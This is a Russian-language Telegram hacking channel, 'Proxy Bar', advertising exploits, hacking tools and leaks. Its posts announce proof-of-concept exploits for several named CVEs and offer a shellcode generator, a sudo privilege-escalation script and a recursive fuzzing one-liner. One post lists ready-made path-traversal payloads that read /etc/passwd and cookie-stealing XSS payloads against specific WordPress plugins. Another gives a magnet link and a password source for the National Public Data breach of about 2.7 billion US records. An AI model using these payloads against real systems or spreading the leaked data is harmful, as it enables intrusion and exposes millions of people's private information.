Proxy Bar – Telegram
Proxy Bar
19.6K subscribers
1.28K photos
76 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
CVE-2022-24834 Redis
*
Затронуто:
7.0.0 ≤ version < 7.0.12
6.2.0 ≤ version < 6.2.13
2.6.0 ≤ version < 6.0.20
*
Большой разбор + PoC exploit RCE
*
VideoPOC


#redis #rce
🔥22👍4
Полезный однострочник для рекурсивного фаззинга

-dirsearch -l urls.txt -e
conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx
~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,con
f,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,ol
d,sql,sql.gz,sql.zip,sql.tar.gz,sql~,swp,swp~,tar,t
ar.bz2,tar.gz,txt,wadl,zip,log,xml,js,json --deep-
recursive --force-recursive --exclude-sizes=0B --
random-agent --full-url -o output.txt

#saveIt
👍29🔥13😱1
Phrack
*
read stuff
👍6🔥1
CVE-2024-7928 FastAdmin
*
Обход каталога и попытка вытащить креды БД
До версии 1.3.3.20220121
*
POC
👍15
NationalPublicData - BD
*
2,7 млрд записей информацией на жителей США
*
National Public Data — шарага, которая собирает жирные объемы приватной инфы, а потом продает, как в медиа так и по запросу. Там и проверка записей из криминальной базы сШа и составление биографических отчетов.
*
Пасс на архив https://usdod.io/ если тянуть с https://usdod.io/


UPDATE
 magnet:?xt=urn:btih:3caa71f3ec8cbccc6fca4feb7185da2bab149ba7&amp;dn=NPD&amp;tr=udp%3A%2F%2Ftracker.opentrackr.org%3A1337%2Fannounce


#bd
👍15🔥8😱5
windows IPv6 exploit
опубликован
бесплатно
навсегда
какие30тыщ?
🔥53😱11👍3
Реверс-инжиниринг и эксплуатация терминалов бесконтактной оплаты
*
Слайды тут
Видео тут
🔥27👍3
ShellGen
*
Павашэлл скрипт для генерации ShellCode в различных форматах.
Форматы: Raw, ps1, Hex, C, vba, csharp
Архитектура: x64, x86
*
DownLoad
🔥11👍8
CVE-2024-28000
*
WordPress, дырка в плагине LiteSpeed Cache (слабая проверка хэша)
LPE без аутентификации во всех версиях плагина WordPress до 6.3.0.1
*
POC exploit
🔥25👍4😱1
🔥66👍12😱12
prv8_nuclei_templates.zip
3.9 MB
Nuclei templates
*
6000 штук
😱38🔥23👍9
This media is not supported in your browser
VIEW IN TELEGRAM
Лохматый научился включать свою любимую тапалку с мышками на айпаде
Скоро рутанет
🔥66👍20😱2
CVE-2024-5932
*
WordPress GiveWP POP to RCE
*
POC exploit
🔥20👍1
CVE-2024-6670 WhatsUp Gold
*
Статья Exploiting Pre-Auth SQL Injection in WhatsUp Gold
*
POC exploit
👍14
Прекрасное в мире плагинов WordPress
*
simple-image-manipulator
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd

activehelper-livehelp
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fnoscript%3E%3Cnoscript%3Ealert%28document.domain%29%3C%2Fnoscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cnoscript%3Ealert%28document.cookie%29%3C/noscript%3E&NAME=NAME%22%3E%3Cnoscript%3Ealert%28document.cookie%29%3C/noscript%3E&

amministrazione-aperta
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd

anti-plagiarism
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fnoscript%3E%3Cnoscript%3Ealert%28document.domain%29%3C%2Fnoscript%3E

buddypress-component-stats
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd

dzs-videogallery
/wp-content/plugins/dzs-videogallery/admin/upload.php

e-search
/wp-content/plugins/e-search/tmpl/noscript_az.php?noscript_az=%3C%2Fnoscript%3E%3Cnoscript%3Ealert%28document.domain%29%3C%2Fnoscript%3E

fancy-product-designer
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php

hd-webplayer
/wp-content/plugins/hd-webplayer/playlist.php

localize-my-post
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
🔥41😱10👍6
This media is not supported in your browser
VIEW IN TELEGRAM
SUDO_KILLER
*
Скрипт под:
Сбор учетных данных
Неправильные конфигурации
Опасные двоичные файлы (GTFOBINS)
Уязвимые версии sudo — CVE
Уязвимость Sudo и неправильная конфигурация, связанные с 3dParty
Опасные переменные окружающей среды
Доступные для записи каталоги, в которых есть скрипты
Двоичные файлы, которые можно заменить/переместить
*
Download + много демо + докер для тестов

#sudo
👍22😱1
CVE-2024-24401 NAGIOS
*
Authenticated SQL Injection
*
POC exploit
🔥17